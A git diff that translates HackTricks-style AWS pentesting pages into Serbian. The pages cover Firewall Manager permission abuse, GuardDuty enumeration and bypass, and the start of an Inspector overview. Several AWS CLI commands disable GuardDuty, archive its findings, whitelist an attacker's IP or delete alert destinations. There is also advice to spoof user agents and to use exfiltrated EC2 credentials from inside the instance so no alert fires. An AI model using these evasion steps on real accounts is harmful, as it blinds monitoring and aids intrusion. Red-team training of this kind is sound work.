-    "ResourceTags": [],
-    "RemediationEnabled": true
-  },
-  "TagList": []
+"Policy": {
+"PolicyName": "permisive_policy",
+"SecurityServicePolicyData": {
+"Type": "SECURITY_GROUPS_COMMON",
+"ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}"
+},
+"ResourceTypeList": [
+"AWS::EC2::Instance",
+"AWS::EC2::NetworkInterface",
+"AWS::EC2::SecurityGroup",
+"AWS::ElasticLoadBalancingV2::LoadBalancer",
+"AWS::ElasticLoadBalancing::LoadBalancer"
+],
+"ResourceType": "AWS::EC2::SecurityGroup",
+"ExcludeResourceTags": false,
+"ResourceTags": [],
+"RemediationEnabled": true
+},
+"TagList": []
 }
 ```
-
-**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment.
+**Potencijalni uticaj:** Demontiranje bezbednosnih kontrola, izbegavanje politika, kršenja usklađenosti, operativne smetnje i potencijalni curenja podataka unutar okruženja.
 
 ### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet`
 
-An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager.
-
+Napadač sa **`fms:BatchAssociateResource`** i **`fms:BatchDisassociateResource`** dozvolama mogao bi da poveže ili odvoji resurse iz skupa resursa Firewall Manager-a. Pored toga, **`fms:PutResourceSet`** i **`fms:DeleteResourceSet`** dozvole bi omogućile napadaču da kreira, menja ili briše ove skupove resursa iz AWS Firewall Manager-a.
 ```bash
 # Associate/Disassociate resources from a resource set
 aws fms batch-associate-resource --resource-set-identifier  --items 
@@ -231,83 +222,68 @@ aws fms batch-disassociate-resource --resource-set-identifier  --items  [--tag-list ]
 aws fms delete-resource-set --identifier 
 ```
-
-**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potencijalni Uticaj:** Dodavanje nepotrebne količine stavki u skup resursa povećaće nivo šuma u Servisu, potencijalno uzrokujući DoS. Pored toga, promene u skupovima resursa mogle bi dovesti do prekida resursa, izbegavanja politika, kršenja usklađenosti i prekida bezbednosnih kontrola unutar okruženja.
 
 ### `fms:PutAppsList`, `fms:DeleteAppsList`
 
-An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS.
-
+Napadač sa **`fms:PutAppsList`** i **`fms:DeleteAppsList`** dozvolama mogao bi da kreira, menja ili briše liste aplikacija iz AWS Firewall Manager-a. Ovo bi moglo biti kritično, jer bi neovlašćene aplikacije mogle dobiti pristup javnosti, ili bi pristup ovlašćenim aplikacijama mogao biti odbijen, uzrokujući DoS.
 ```bash
 aws fms put-apps-list --apps-list  [--tag-list ]
 aws fms delete-apps-list --list-id 
 ```
-
-**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potencijalni uticaj:** Ovo bi moglo rezultirati pogrešnim konfiguracijama, izbegavanjem politika, kršenjem usklađenosti i prekidom bezbednosnih kontrola unutar okruženja.
 
 ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList`
 
-An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS.
-
+Napadač sa **`fms:PutProtocolsList`** i **`fms:DeleteProtocolsList`** dozvolama mogao bi da kreira, menja ili briše liste protokola iz AWS Firewall Manager-a. Slično kao kod lista aplikacija, ovo bi moglo biti kritično jer bi neovlašćeni protokoli mogli biti korišćeni od strane šire javnosti, ili bi korišćenje ovlašćenih protokola moglo biti onemogućeno, uzrokujući DoS.
 ```bash
 aws fms put-protocols-list --apps-list  [--tag-list ]
 aws fms delete-protocols-list --list-id 
 ```
-
-**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potencijalni uticaj:** Ovo može rezultirati pogrešnim konfiguracijama, izbegavanjem politika, kršenjem usklađenosti i prekidom bezbednosnih kontrola unutar okruženja.
 
 ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel`
 
-An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs.
+Napadač sa **`fms:PutNotificationChannel`** i **`fms:DeleteNotificationChannel`** dozvolama mogao bi da obriše i odredi IAM ulogu i Amazon Simple Notification Service (SNS) temu koju Firewall Manager koristi za snimanje SNS logova.
 
-To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role.
+Da biste koristili **`fms:PutNotificationChannel`** van konzole, potrebno je da postavite pristupnu politiku SNS teme, omogućavajući specificiranoj **SnsRoleName** da objavljuje SNS logove. Ako je navedena **SnsRoleName** uloga drugačija od **`AWSServiceRoleForFMS`**, zahteva poverenje koje je konfigurirano da dozvoli Firewall Manager servisnom principalu **fms.amazonaws.com** da preuzme ovu ulogu.
 
-For information about configuring an SNS access policy:
+Za informacije o konfigurisanju pristupne politike SNS:
 
 {{#ref}}
 ../aws-sns-enum.md
 {{#endref}}
-
 ```bash
 aws fms put-notification-channel --sns-topic-arn  --sns-role-name 
 aws fms delete-notification-channel
 ```
-
-**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment.
+**Potencijalni Uticaj:** Ovo bi potencijalno moglo dovesti do propuštenih bezbednosnih upozorenja, kašnjenja u odgovoru na incidente, potencijalnih provala podataka i operativnih prekida unutar okruženja.
 
 ### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall`
 
-An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager.
+Napadač sa **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** dozvolama bi mogao da poveže ili odvoji treće strane vatrozidove koji se upravljaju centralno putem AWS Firewall Manager-a.
 
 > [!WARNING]
-> Only the default administrator can create and manage third-party firewalls.
-
+> Samo podrazumevani administrator može da kreira i upravlja vatrozidovima trećih strana.
 ```bash
 aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
 aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
 ```
-
-**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation.
+**Potencijalni Uticaj:** Disocijacija bi dovela do izbegavanja politike, kršenja usklađenosti i prekida bezbednosnih kontrola unutar okruženja. Asocijacija, s druge strane, bi dovela do prekida raspodele troškova i budžeta.
 
 ### `fms:TagResource`, `fms:UntagResource`
 
-An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+Napadač bi mogao da doda, izmeni ili ukloni oznake sa resursa Firewall Manager-a, ometajući raspodelu troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
 ```bash
 aws fms tag-resource --resource-arn  --tag-list 
 aws fms untag-resource --resource-arn  --tag-keys 
 ```
+**Potencijalni Uticaj**: Poremećaj alokacije troškova, praćenja resursa i politika kontrole pristupa zasnovanih na oznakama.
 
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
-
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html)
 - [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
index 2794852d3..91b585741 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
@@ -4,64 +4,63 @@
 
 ## GuardDuty
 
-According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs.
+Prema [**dokumentaciji**](https://aws.amazon.com/guardduty/features/): GuardDuty kombinuje **mašinsko učenje, detekciju anomalija, praćenje mreže i otkrivanje zlonamernih datoteka**, koristeći kako AWS, tako i vodeće izvore trećih strana kako bi pomogao u zaštiti radnih opterećenja i podataka na AWS-u. GuardDuty je sposoban da analizira desetine milijardi događaja iz više AWS izvora podataka, kao što su AWS CloudTrail dnevnici događaja, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) revizijski i sistemski dnevnici, i DNS upiti.
 
-Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation.
+Amazon GuardDuty **identifikuje neobičnu aktivnost unutar vaših naloga**, analizira **bezbednosnu relevantnost** aktivnosti i daje **kontekst** u kojem je aktivnost pokrenuta. Ovo omogućava odgovaraču da odredi da li treba da potroši vreme na dalju istragu.
 
-Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events.
+Upozorenja **se pojavljuju u GuardDuty konzoli (90 dana)** i CloudWatch događajima.
 
 > [!WARNING]
-> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\
-> If you just stop it, the existing findings will remain.
+> Kada korisnik **onemogući GuardDuty**, prestaćete da pratite vaše AWS okruženje i neće generisati nove nalaze, a **postojeći nalazi će biti izgubljeni**.\
+> Ako ga samo zaustavite, postojeći nalazi će ostati.
 
-### Findings Example
+### Primer Nalaza
 
-- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP.
-- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS.
-- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses.
-- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets.
+- **Reconnaissance**: Aktivnost koja sugeriše izviđanje od strane napadača, kao što su **neobične API aktivnosti**, sumnjivi pokušaji **prijavljivanja** u bazu podataka, intra-VPC **skeniranje portova**, neobični obrasci neuspešnih zahteva za prijavljivanje, ili neblokirano ispitivanje portova sa poznate loše IP adrese.
+- **Kompromitovanje instance**: Aktivnost koja ukazuje na kompromitovanje instance, kao što su **rudarenje kriptovaluta, backdoor komanda i kontrola (C\&C)**, zlonamerni softver koji koristi algoritme generisanja domena (DGA), aktivnost odbijanja usluge, neobično **visok** obim mrežnog saobraćaja, neobični mrežni protokoli, komunikacija instance sa poznatom zlonamernom IP adresom, privremene Amazon EC2 akreditive korišćene od strane spoljne IP adrese, i eksfiltracija podataka korišćenjem DNS-a.
+- **Kompromitovanje naloga**: Uobičajeni obrasci koji ukazuju na kompromitovanje naloga uključuju API pozive iz neobične geolokacije ili anonimnog proksija, pokušaje onemogućavanja AWS CloudTrail logovanja, promene koje oslabljuju politiku lozinki naloga, neobične instance ili lansiranja infrastrukture, implementacije infrastrukture u neobičnoj regiji, krađu akreditiva, sumnjivu aktivnost prijavljivanja u bazu podataka, i API pozive sa poznatih zlonamernih IP adresa.
+- **Kompromitovanje bucket-a**: Aktivnost koja ukazuje na kompromitovanje bucket-a, kao što su sumnjivi obrasci pristupa podacima koji ukazuju na zloupotrebu akreditiva, neobične Amazon S3 API aktivnosti sa udaljenog hosta, neovlašćen pristup S3-u sa poznatih zlonamernih IP adresa, i API pozivi za preuzimanje podataka iz S3 bucket-a od korisnika bez prethodne istorije pristupa bucket-u ili pokrenutih iz neobične lokacije. Amazon GuardDuty kontinuirano prati i analizira AWS CloudTrail S3 događaje (npr. GetObject, ListObjects, DeleteObject) kako bi otkrio sumnjivu aktivnost širom svih vaših Amazon S3 bucket-a.
 
 

 
-Finding Information
+Informacije o nalazima
 
-Finding summary:
+Sažetak nalaza:
 
-- Finding type
-- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low
-- Region
-- Account ID
-- Resource ID
-- Time of detection
-- Which threat list was used
+- Tip nalaza
+- Ozbiljnost: 7-8.9 Visoka, 4-6.9 Srednja, 01-3.9 Niska
+- Regija
+- ID naloga
+- ID resursa
+- Vreme detekcije
+- Koja je lista pretnji korišćena
 
-The body has this information:
+Telo sadrži ove informacije:
 
-- Resource affected
-- Action
-- Actor: Ip address, port and domain
-- Additional Information
+- Pogođeni resurs
+- Akcija
+- Akter: IP adresa, port i domen
+- Dodatne informacije
 
 

 
-### All Findings
+### Svi Nalazi
 
-Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
+Pristupite listi svih GuardDuty nalaza na: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
 
-### Multi Accounts
+### Više Naloga
 
-#### By Invitation
+#### Po Pozivnici
 
-You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.
+Možete **pozvati druge naloge** u različit AWS GuardDuty nalog tako da **svaki nalog bude praćen iz iste GuardDuty**. Glavni nalog mora pozvati članove naloga, a zatim predstavnik članskog naloga mora prihvatiti pozivnicu.
 
-#### Via Organization
+#### Putem Organizacije
 
-You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator.
+Možete odrediti bilo koji nalog unutar organizacije da bude **delegirani administrator GuardDuty**. Samo nalog za upravljanje organizacijom može odrediti delegiranog administratora.
 
-An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account.
-
-## Enumeration
+Nalog koji se odredi kao delegirani administrator postaje nalog administratora GuardDuty, automatski ima omogućenu GuardDuty u određenoj AWS regiji, i takođe ima **dozvolu da omogući i upravlja GuardDuty za sve naloge u organizaciji unutar te regije**. Ostali nalozi u organizaciji mogu se pregledati i dodati kao članovi GuardDuty povezani sa ovim delegiranim administratorskim nalogom.
 
+## Enumeracija
 ```bash
 # Get Org config
 aws guardduty list-organization-admin-accounts #Get Delegated Administrator
@@ -101,85 +100,76 @@ aws guardduty list-publishing-destinations --detector-id 
 aws guardduty list-threat-intel-sets --detector-id 
 aws guardduty get-threat-intel-set --detector-id  --threat-intel-set-id 
 ```
-
 ## GuardDuty Bypass
 
 ### General Guidance
 
-Try to find out as much as possible about the behaviour of the credentials you are going to use:
+Pokušajte da saznate što je moguće više o ponašanju kredencijala koje ćete koristiti:
 
-- Times it's used
-- Locations
-- User Agents / Services (It could be used from awscli, webconsole, lambda...)
-- Permissions regularly used
+- Vremena kada se koriste
+- Lokacije
+- User Agents / Usluge (Može se koristiti iz awscli, webconsole, lambda...)
+- Dozvole koje se redovno koriste
 
-With this information, recreate as much as possible the same scenario to use the access:
+Sa ovom informacijom, rekreirajte što je moguće više istog scenarija za korišćenje pristupa:
 
-- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible)
-- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges
-- Always try to use the **same permissions** this principal has used
-- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one)
+- Ako je to **korisnik ili uloga kojoj pristupa korisnik**, pokušajte da je koristite u istim satima, iz iste geolokacije (čak i istog ISP-a i IP-a ako je moguće)
+- Ako je to **uloga koju koristi usluga**, kreirajte istu uslugu u istoj regiji i koristite je odatle u istim vremenskim intervalima
+- Uvek pokušavajte da koristite **iste dozvole** koje je ovaj princip koristio
+- Ako treba da **koristite druge dozvole ili zloupotrebite dozvolu** (na primer, preuzmite 1.000.000 cloudtrail log fajlova) radite to **polako** i sa **minimalnim brojem interakcija** sa AWS-om (awscli ponekad poziva nekoliko read API-ja pre write API-ja)
 
 ### Breaking GuardDuty
 
 #### `guardduty:UpdateDetector`
 
-With this permission you could disable GuardDuty to avoid triggering alerts.
-
+Sa ovom dozvolom mogli biste da onemogućite GuardDuty kako biste izbegli aktiviranje alarma.
 ```bash
 aws guardduty update-detector --detector-id  --no-enable
 aws guardduty update-detector --detector-id  --data-sources S3Logs={Enable=false}
 ```
-
 #### `guardduty:CreateFilter`
 
-Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings:
-
+Napadači sa ovom dozvolom imaju mogućnost da **koriste filtre za automatsko** arhiviranje nalaza:
 ```bash
 aws guardduty create-filter  --detector-id  --name  --finding-criteria file:///tmp/criteria.json --action ARCHIVE
 ```
-
 #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`)
 
-Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts.
-
+Napadači sa prethodnim privilegijama mogli bi da modifikuju GuardDuty-ovu [**Listu pouzdanih IP adresa**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) dodajući svoju IP adresu na nju i izbegli generisanje upozorenja.
 ```bash
 aws guardduty update-ip-set --detector-id  --activate --ip-set-id  --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv
 ```
-
 #### `guardduty:DeletePublishingDestination`
 
-Attackers could remove the destination to prevent alerting:
-
+Napadači bi mogli ukloniti odredište kako bi sprečili upozorenje:
 ```bash
 aws guardduty delete-publishing-destination --detector-id  --destination-id 
 ```
-
 > [!CAUTION]
-> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings.
+> Brisanje ovog odredišta za objavljivanje **neće uticati na generisanje ili vidljivost nalaza unutar GuardDuty konzole**. GuardDuty će nastaviti da analizira događaje u vašem AWS okruženju, identifikuje sumnjivo ili neočekivano ponašanje i generiše nalaze.
 
-### Specific Findings Bypass Examples
+### Primeri zaobilaženja specifičnih nalaza
 
-Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught.
+Imajte na umu da postoji desetine GuardDuty nalaza, međutim, **kao Red Teamer, nećete biti pogođeni svim njima**, a što je bolje, imate **potpunu dokumentaciju o svakom od njih** na [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) pa pogledajte pre nego što preduzmete bilo kakvu akciju da ne biste bili uhvaćeni.
 
-Here you have a couple of examples of specific GuardDuty findings bypasses:
+Evo nekoliko primera specifičnih zaobilaženja GuardDuty nalaza:
 
 #### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) 
 
-GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\
-It's detected by the **user agent name** that is passed in the API request.\
-Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack.
+GuardDuty detektuje AWS API zahteve iz uobičajenih alata za penetraciono testiranje i aktivira [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\
+Detektuje se po **nazivu korisničkog agenta** koji se prosleđuje u API zahtevu.\
+Stoga, **modifikovanjem korisničkog agenta** moguće je sprečiti GuardDuty da detektuje napad.
 
-To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering.
+Da biste to sprečili, možete pretražiti skriptu `session.py` u `botocore` paketu i modifikovati korisnički agent, ili postaviti Burp Suite kao AWS CLI proxy i promeniti korisnički agent sa MitM ili jednostavno koristiti OS kao što su Ubuntu, Mac ili Windows, što će sprečiti aktiviranje ovog upozorenja.
 
 #### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration
 
-Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert.
+Ekstrakcija EC2 kredencijala iz metadata servisa i **korišćenje njih van** AWS okruženja aktivira [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) upozorenje. Nasuprot tome, korišćenje ovih kredencijala sa vaše EC2 instance aktivira [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) upozorenje. Ipak, **korišćenje kredencijala na drugoj kompromitovanoj EC2 instanci unutar istog naloga prolazi neprimećeno**, ne podižući nikakvo upozorenje.
 
 > [!TIP]
-> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert.
+> Stoga, **koristite exfiltrirane kredencijale iznutra mašine** gde ste ih pronašli da ne biste aktivirali ovo upozorenje.
 
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
 - [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html)
@@ -191,7 +181,3 @@ Extracting EC2 credentials from the metadata service and **utilizing them outsid
 - [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
index 655b81fa7..878ac49fd 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
@@ -6,83 +6,82 @@
 
 ### Inspector
 
-Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.
+Amazon Inspector je napredna, automatizovana usluga za upravljanje ranjivostima koja je dizajnirana da poboljša bezbednost vašeg AWS okruženja. Ova usluga kontinuirano skenira Amazon EC2 instance, slike kontejnera u Amazon ECR, Amazon ECS i AWS Lambda funkcije za ranjivosti i neželjeno izlaganje mreži. Korišćenjem robusne baze podataka o ranjivostima, Amazon Inspector pruža detaljna otkrića, uključujući nivoe ozbiljnosti i preporuke za otklanjanje, pomažući organizacijama da proaktivno identifikuju i reše bezbednosne rizike. Ovaj sveobuhvatan pristup osigurava ojačanu bezbednosnu poziciju širom različitih AWS usluga, pomažući u usklađenosti i upravljanju rizicima.
 
-### Key elements
+### Ključni elementi
 
-#### Findings
+#### Otkrića
 
-Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as:
+Otkrića u Amazon Inspector su detaljni izveštaji o ranjivostima i izloženostima otkrivenim tokom skeniranja EC2 instanci, ECR repozitorijuma ili Lambda funkcija. Na osnovu svog stanja, otkrića se kategorizuju kao:
 
-- **Active**: The finding has not been remediated.
-- **Closed**: The finding has been remediated.
-- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**.
+- **Aktivno**: Otkriće nije otklonjeno.
+- **Zatvoreno**: Otkriće je otklonjeno.
+- **Potisnuto**: Otkriće je označeno ovim stanjem zbog jednog ili više **pravila potiskivanja**.
 
-Findings are also categorized into the next three types:
+Otkrića su takođe kategorizovana u sledeće tri vrste:
 
-- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues.
-- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches.
-- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups.
+- **Paket**: Ova otkrića se odnose na ranjivosti u softverskim paketima instaliranim na vašim resursima. Primeri uključuju zastarele biblioteke ili zavisnosti sa poznatim bezbednosnim problemima.
+- **Kod**: Ova kategorija uključuje ranjivosti pronađene u kodu aplikacija koje rade na vašim AWS resursima. Uobičajeni problemi su greške u kodiranju ili nesigurne prakse koje mogu dovesti do bezbednosnih proboja.
+- **Mreža**: Mrežna otkrića identifikuju potencijalne izloženosti u mrežnim konfiguracijama koje bi napadači mogli iskoristiti. Ovo uključuje otvorene portove, nesigurne mrežne protokole i pogrešno konfigurisane bezbednosne grupe.
 
-#### Filters and Suppression Rules
+#### Filteri i pravila potiskivanja
 
-Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues.
+Filteri i pravila potiskivanja u Amazon Inspector pomažu u upravljanju i prioritetizaciji otkrića. Filteri vam omogućavaju da precizirate otkrića na osnovu specifičnih kriterijuma, kao što su ozbiljnost ili tip resursa. Pravila potiskivanja omogućavaju vam da potisnete određena otkrića koja se smatraju niskim rizikom, koja su već ublažena, ili iz bilo kog drugog važnog razloga, sprečavajući ih da preopterete vaše bezbednosne izveštaje i omogućavajući vam da se fokusirate na kritičnije probleme.
 
